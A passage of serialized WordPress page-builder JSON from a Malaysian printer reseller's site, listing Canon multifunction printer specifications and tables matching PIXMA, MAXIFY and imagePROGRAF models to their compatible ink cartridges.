MF525x\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bdbe9d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\",\"id\":2731}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7b20d6b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n\\nSmarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 43ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 2,000 - 7,500 pages<\\/li>\\n \\t<li>FPOT: 6.2secs. (A4)<\\/li>\\n \\t<li>Max. paper input capacity: Up to 2,300 sheets<\\/li>\\n \\t<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li>\\n<\\/ul>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f0eb648\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f3b97a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ef6036c\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF426dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e51740\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\",\"id\":2732}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ca5e93\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact 4-in-1 Black and White Multifunction for the smart business<\\/strong><\\/p>\\n\\n<\\/div>\\nWith cutting-edge features, the MF426dw is set to boost work productivity in the modern office.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 38ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 750 - 4,000 pages<\\/li>\\n \\t<li>FPOT: 5.5secs. (A4)<\\/li>\\n \\t<li>Max. paper input capacity: Up to 900 sheets<\\/li>\\n \\t<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li>\\n<\\/ul>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2a7e17a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f4fce1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"45b0f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d249821\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cartridge Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2dd6823\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"d81a183\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62697a3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0<\\/p><table border=\\\"1\\\" width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><strong>Model<\\/strong><\\/td><td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td><\\/tr><tr><td rowspan=\\\"13\\\" align=\\\"center\\\">imagePROGRAF PRO-500<\\/td><td>Maintenance Cartridge MC-20<\\/td><\\/tr><tr><td>PFI-50 (Blue)<\\/td><\\/tr><tr><td>PFI-50 (Chroma Optimizer)<\\/td><\\/tr><tr><td>PFI-50 (Cyan)<\\/td><\\/tr><tr><td>PFI-50 (Gray)<\\/td><\\/tr><tr><td>PFI-50 (Magenta)<\\/td><\\/tr><tr><td>PFI-50 (Matte Black)<\\/td><\\/tr><tr><td>PFI-50 (Photo Black)<\\/td><\\/tr><tr><td>PFI-50 (Photo Cyan)<\\/td><\\/tr><tr><td>PFI-50 (Photo Gray)<\\/td><\\/tr><tr><td>PFI-50 (Photo Magenta)<\\/td><\\/tr><tr><td>PFI-50 (Red)<\\/td><\\/tr><tr><td>PFI-50 (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY iB4170<\\/td><td>PGI-2700 (Black)<\\/td><\\/tr><tr><td>PGI-2700 (Cyan)<\\/td><\\/tr><tr><td>PGI-2700 (Magenta)<\\/td><\\/tr><tr><td>PGI-2700 (Yellow)<\\/td><\\/tr><tr><td>PGI-2700XL (Black)<\\/td><\\/tr><tr><td>PGI-2700XL (Cyan)<\\/td><\\/tr><tr><td>PGI-2700XL (Magenta)<\\/td><\\/tr><tr><td>PGI-2700XL (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5070<\\/td><td>PGI-2700 (Black)<\\/td><\\/tr><tr><td>PGI-2700 (Cyan)<\\/td><\\/tr><tr><td>PGI-2700 (Magenta)<\\/td><\\/tr><tr><td>PGI-2700 (Yellow)<\\/td><\\/tr><tr><td>PGI-2700XL (Black)<\\/td><\\/tr><tr><td>PGI-2700XL (Cyan)<\\/td><\\/tr><tr><td>PGI-2700XL (Magenta)<\\/td><\\/tr><tr><td>PGI-2700XL (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5170<\\/td><td>PGI-2700 (Black)<\\/td><\\/tr><tr><td>PGI-2700 (Cyan)<\\/td><\\/tr><tr><td>PGI-2700 (Magenta)<\\/td><\\/tr><tr><td>PGI-2700 (Yellow)<\\/td><\\/tr><tr><td>PGI-2700XL (Black)<\\/td><\\/tr><tr><td>PGI-2700XL (Cyan)<\\/td><\\/tr><tr><td>PGI-2700XL (Magenta)<\\/td><\\/tr><tr><td>PGI-2700XL (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5370<\\/td><td>PGI-2700 (Black)<\\/td><\\/tr><tr><td>PGI-2700 (Cyan)<\\/td><\\/tr><tr><td>PGI-2700 (Magenta)<\\/td><\\/tr><tr><td>PGI-2700 (Yellow)<\\/td><\\/tr><tr><td>PGI-2700XL (Black)<\\/td><\\/tr><tr><td>PGI-2700XL (Cyan)<\\/td><\\/tr><tr><td>PGI-2700XL (Magenta)<\\/td><\\/tr><tr><td>PGI-2700XL (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5470<\\/td><td>PGI-2700 (Black)<\\/td><\\/tr><tr><td>PGI-2700 (Cyan)<\\/td><\\/tr><tr><td>PGI-2700 (Magenta)<\\/td><\\/tr><tr><td>PGI-2700 (Yellow)<\\/td><\\/tr><tr><td>PGI-2700XL (Black)<\\/td><\\/tr><tr><td>PGI-2700XL (Cyan)<\\/td><\\/tr><tr><td>PGI-2700XL (Magenta)<\\/td><\\/tr><tr><td>PGI-2700XL (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E3170<\\/td><td>CL-57 (Colour)<\\/td><\\/tr><tr><td>CL-57S (Colour)<\\/td><\\/tr><tr><td>PG-47 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E410<\\/td><td>CL-57 (Colour)<\\/td><\\/tr><tr><td>CL-57S (Colour)<\\/td><\\/tr><tr><td>PG-47 (Pigment Black)<\\/td><\\/tr><\\/tbody><\\/table>\",\"column_gap\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4c78b87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"71e2027\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0<\\/p><table border=\\\"1\\\" width=\\\"378\\\" cellpadding=\\\"10\\\"><tbody><tr><td width=\\\"170\\\"><strong>Model<\\/strong><\\/td><td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td><\\/tr><tr><td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E4270<\\/td><td>CL-57 (Colour)<\\/td><\\/tr><tr><td>CL-57S (Colour)<\\/td><\\/tr><tr><td>PG-47 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E470<\\/td><td>CL-57 (Colour)<\\/td><\\/tr><tr><td>CL-57S (Colour)<\\/td><\\/tr><tr><td>PG-47 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E477<\\/td><td>CL-57S (Colour)<\\/td><\\/tr><tr><td>PG-47 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E480<\\/td><td>CL-57 (Colour)<\\/td><\\/tr><tr><td>PG-47 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E510<\\/td><td>CL-98 (Colour)<\\/td><\\/tr><tr><td>PG-88 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E560<\\/td><td>CL-99 (Colour)<\\/td><\\/tr><tr><td>PG-89 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E560 \\/ E560R<\\/td><td>CL-99 (Colour)<\\/td><\\/tr><tr><td>PG-89 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G1000<\\/td><td>GI-790 (Black)<\\/td><\\/tr><tr><td>GI-790 (Cyan)<\\/td><\\/tr><tr><td>GI-790 (Magenta)<\\/td><\\/tr><tr><td>GI-790 (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G1010<\\/td><td>GI-790 (Black)<\\/td><\\/tr><tr><td>GI-790 (Cyan)<\\/td><\\/tr><tr><td>GI-790 (Magenta)<\\/td><\\/tr><tr><td>GI-790 (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G2010<\\/td><td>GI-790 (Black)<\\/td><\\/tr><tr><td>GI-790 (Cyan)<\\/td><\\/tr><tr><td>GI-790 (Magenta)<\\/td><\\/tr><tr><td>GI-790 (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G3000<\\/td><td>GI-790 (Black)<\\/td><\\/tr><tr><td>GI-790 (Cyan)<\\/td><\\/tr><tr><td>GI-790 (Magenta)<\\/td><\\/tr><tr><td>GI-790 (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G3010<\\/td><td>GI-790 (Black)<\\/td><\\/tr><tr><td>GI-790 (Cyan)<\\/td><\\/tr><tr><td>GI-790 (Magenta)<\\/td><\\/tr><tr><td>GI-790 (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G4010<\\/td><td>GI-790 (Black)<\\/td><\\/tr><tr><td>GI-790 (Cyan)<\\/td><\\/tr><tr><td>GI-790 (Magenta)<\\/td><\\/tr><tr><td>GI-790 (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA iP100<\\/td><td>CLI-36 (Colour)<\\/td><\\/tr><tr><td>PGI-35 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA iP110<\\/td><td>CLI-36 (Colour)<\\/td><\\/tr><tr><td>PGI-35 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA iP110 (with battery)<\\/td><td>CLI-36 (Colour)<\\/td><\\/tr><tr><td>PGI-35 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA iP1300<\\/td><td>CL-41 (Colour)<\\/td><\\/tr><tr><td>PG-40 (Pigment Black)<\\/td><\\/tr><tr><td>PG-40\\/CL-41 Value Pack<\\/td><\\/tr><tr><td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA iP2770 \\/ iP2772<\\/td><td>CL-811 (Colour)<\\/td><\\/tr><tr><td>CL-811XL (Colour)<\\/td><\\/tr><tr><td>PG-810 (Pigment Black)<\\/td><\\/tr><tr><td>PG-810 Twin Pack<\\/td><\\/tr><tr><td>PG-810\\/CL-811 Value Pack<\\/td><\\/tr><tr><td>PG-810XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA iP2870S<\\/td><td>CL-746 (Colour)<\\/td><\\/tr><tr><td>CL-746S (Colour)<\\/td><\\/tr><tr><td>PG-745 (Pigment Black)<\\/td><\\/tr><tr><td>PG-745S (Pigment Black)<\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"13e8990\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"70107ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"  <table width=\\\"378\\\" border=\\\"1\\\" cellpadding=\\\"10\\\">\\n    <tbody>\\n    <tr>\\n      <td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n      <td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA iP4200<\\/td>\\n      <td>CLI-8 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"10\\\" align=\\\"center\\\">PIXMA iP7270<\\/td>\\n      <td>CLI-751 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-750 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-750XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"12\\\" align=\\\"center\\\">PIXMA iP8770<\\/td>\\n      <td>CLI-751 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751 (Gray)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Gray)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-750 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-750XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"11\\\" align=\\\"center\\\">PIXMA iX6770<\\/td>\\n      <td>CLI-751 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-750 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-750XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-755XXL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"11\\\" align=\\\"center\\\">PIXMA iX6870<\\/td>\\n      <td>CLI-751 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-750 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-750XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-755XXL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MG2570S<\\/td>\\n      <td>CL-746 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-746S (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-746XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-745 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-745S (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-745XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MG2577S<\\/td>\\n      <td>CL-746 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-746S (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-746XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-745 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-745S (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-745XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <\\/tbody>\\n  <\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac4d506\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2645364\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62e0d92\",\"elType\":\"widget\",\"settings\":{\"editor\":\"  <table width=\\\"378\\\" border=\\\"1\\\" cellpadding=\\\"10\\\">\\n    <tbody>\\n    <tr>\\n      <td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n      <td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MG3570<\\/td>\\n      <td>CL-741 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-741XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-740 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-740\\/CL-741 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-740XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MG3670<\\/td>\\n      <td>CL-741 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-741XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-740 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-740\\/CL-741 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-740XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"10\\\" align=\\\"center\\\">PIXMA MG7570<\\/td>\\n      <td>CLI-751 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751 (Gray)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Gray)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP160<\\/td>\\n      <td>CL-41 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40\\/CL-41 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP170<\\/td>\\n      <td>CL-41 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40\\/CL-41 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP180<\\/td>\\n      <td>CL-41 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40\\/CL-41 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP228<\\/td>\\n      <td>CL-41 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-831 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40\\/CL-41 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-830 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP237<\\/td>\\n      <td>CL-811 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-811XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 Twin Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810\\/CL-811 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP245<\\/td>\\n      <td>CL-811 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-811XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 Twin Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810\\/CL-811 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP258<\\/td>\\n      <td>CL-811 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-811XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 Twin Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810\\/CL-811 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP276<\\/td>\\n      <td>CL-811 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-811XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 Twin Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810\\/CL-811 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <\\/tbody>\\n  <\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2be4aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d0f60c7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\" border=\\\"1\\\" cellpadding=\\\"10\\\">\\n  <tbody>\\n    <tr>\\n      <td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n      <td width=\\\"170\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP287<\\/td>\\n      <td>CL-811 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-811XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 Twin Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810\\/CL-811 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP460<\\/td>\\n      <td>CL-41 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40\\/CL-41 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP476<\\/td>\\n      <td>CL-41 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-831 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    